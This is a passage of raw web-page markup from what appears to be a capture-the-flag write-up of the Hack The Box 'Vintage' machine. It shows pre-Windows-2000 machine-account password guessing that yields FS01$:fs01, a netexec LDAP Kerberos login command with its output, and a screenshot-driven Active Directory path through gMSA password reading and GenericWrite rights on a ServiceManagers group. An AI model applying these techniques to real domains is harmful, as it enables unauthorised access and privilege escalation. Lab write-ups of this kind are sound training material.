17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But On NetExec -M pre2k I&#8217;ve got blank result, don&#8217;t wether it&#8217;s REALM access or wrong flag but eventually I did the pre2k manually and It&#8217;s a success.</p><p>PS: We already know the computers account of FS01, and we&#8217;ve got a pairs of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: FS01$
passwd: fs01</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u 'FS01$' -p fs01 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\FS01$:fs01</code></pre></div><p>So let&#8217;s see what&#8217;s next after FS01 machine access.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UqF7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UqF7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UqF7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:104712,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UqF7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!UqF7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8104b92-6073-400c-9975-7dfe0c1e51a2_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This guy have one out-bound object of reading gMSA password from user gMSA01$:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mQjw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mQjw!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mQjw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:170964,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2d489dd-971b-4dfb-b078-ef7f708d8db1_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mQjw!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!mQjw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F169252a0-e796-4ac5-b1fd-61f6b294f8b3_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Then user gMSA01$ also have one OOB:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Go1V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Go1V!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Go1V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:183088,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6369ce1d-5447-4f1d-90e5-10ee1647cbaa_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Go1V!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!Go1V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2258ad39-2b76-4059-8378-6d548a97c1e7_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Which an ability to addSelf and GenericWrite to a group of &#8220;ServiceManagers&#8221;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tjrN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tjrN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tjrN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:137383,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd55af62b-d839-4e9c-b9b3-e5aa8f2aac85_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tjrN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!tjrN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e0a59db-2a05-4d69-a302-fe17c7c6f181_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Eventually that Group of &#8220;ServiceManagers&#8220; have 3 out-bound object control:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!S5VY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!S5VY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!S5VY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:192009,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fea797188-3fba-47b4-b7e8-954570db97b2_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!S5VY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!S5VY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95b0cdb8-967b-4437-b096-7d50a62eb06e_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9V75!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9V75!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!9V75!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 848w, 